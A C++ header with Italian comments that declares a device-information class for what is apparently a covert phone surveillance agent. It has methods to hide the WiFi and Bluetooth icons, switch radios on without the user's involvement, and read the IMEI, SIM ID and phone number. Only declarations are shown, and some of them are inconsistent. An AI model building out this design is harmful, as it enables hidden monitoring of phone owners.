#include "Common.h"
#include <string>
#include <exception>
using namespace std;

#ifndef __Device_h__
#define __Device_h__

#include "Status.h"

class Status;
class Device;

class Device
{
	/**
	 * Struttura che definisce le funzionalita' presenti sul dispositivo e supportate da noi.
	 */
	private: DeviceStruct DevStruct;
	/**
	 * Database statico dei modelli e funzionalita' supportati.
	 */
	private: map<WCHAR *, DeviceStruct, PVOID> db;
	private: Status statusObj;

	/**
	 * Torna una stringa che descrive il modello di telefono, la stringa va poi liberata dal chiamante.
	 */
	public: WCHAR* GetDeviceType();

	/**
	 * Ottiene informazioni sul sistema operativo e riempie la struttura passata per riferimento, torna TRUE se la
	 * chiamata e' andata a buon fine, FALSE altrimenti.
	 */
	public: BOOL GetOsVersion(OSVERSIONINFO* pVersionInfo);

	/**
	 * Torna TRUE se supportiamo l'hiding dell'icona del WiFi, FALSE altrimenti. Internamente questa funzione
	 * chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le funzionalita'
	 * supportate.
	 */
	public: BOOL IsWiFiHidingSupported();

	/**
	 * Torna TRUE se supportiamo l'hiding dell'icona del BlueTooth, FALSE altrimenti. Internamente questa funzione
	 * chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le funzionalita'
	 * supportate.
	 */
	public: void IsBTHidingSupported();

	/**
	 * Torna TRUE se il dispositivo e' dotato di un modulo per l'utilizzo del WiFi, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsWifi();

	/**
	 * Torna TRUE se il dispositivo e' dotato di un modulo per l'utilizzo del BT, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsBT();

	/**
	 * Torna TRUE se siamo in grado di attivare il WiFi senza intervento dell'utente, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsWiFiActivable();

	/**
	 * Torna TRUE se siamo in grado di attivare il BT senza intervento dell'utente, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsBTActivable();

	/**
	 * Questa funzione legge l'Id dalla SIM e scrive il valore letto nel buffer passato per riferimento. Torna TRUE
	 * se la lettura e' andata a buon fine, FALSE altrimenti.
	 */
	public: BOOL GetSimId(BYTE* pSimId);

	/**
	 * Questa funzione legge il codice IMEI dal telefono e scrive il valore nel buffer passato per riferimento. 
	 * Torna TRUE se la lettura e' andata a buon fine, FALSE altrimenti.
	 */
	public: BOOL GetImei(BYTE* pImei);

	/**
	 * Questa funzione ottiene un ID univoco per ogni telefono, nel seguente modo:
	 * 1. Legge il codice IMEI lo xora con il Cpu Id e ne effettua lo Sha1.
	 * 2. Se non e' possibile leggere il codice IMEI viene effettuato lo Sha1 dello del Cpu ID.
	 * In ogni caso il valore viene scritto nel buffer passato per riferimento alla funzione. La funzione torna TRUE
	 * se e' stato possibile generare un ID univoco, FALSE altrimenti.
	 */
	public: BOOL GetUniqueId(BYTE* pUniqueId);

	/**
	 * Ottiene il numero di telefono associato alla SIM correntemente inserita, il numero viene scritto come _stringa_
	 * all'interno del buffer passato per riferimento. La funziona torna TRUE se il numero e' stato letto 
	 * correttamente, FALSE altrimenti.
	 */
	public: BOOL GetPhoneNumber(WCHAR* pPhoneNumber);

	/**
	 * Costruttore di default, inizializza il database dei modelli e delle funzioni supportate.
	 */
	public:  Device();
};

#endif
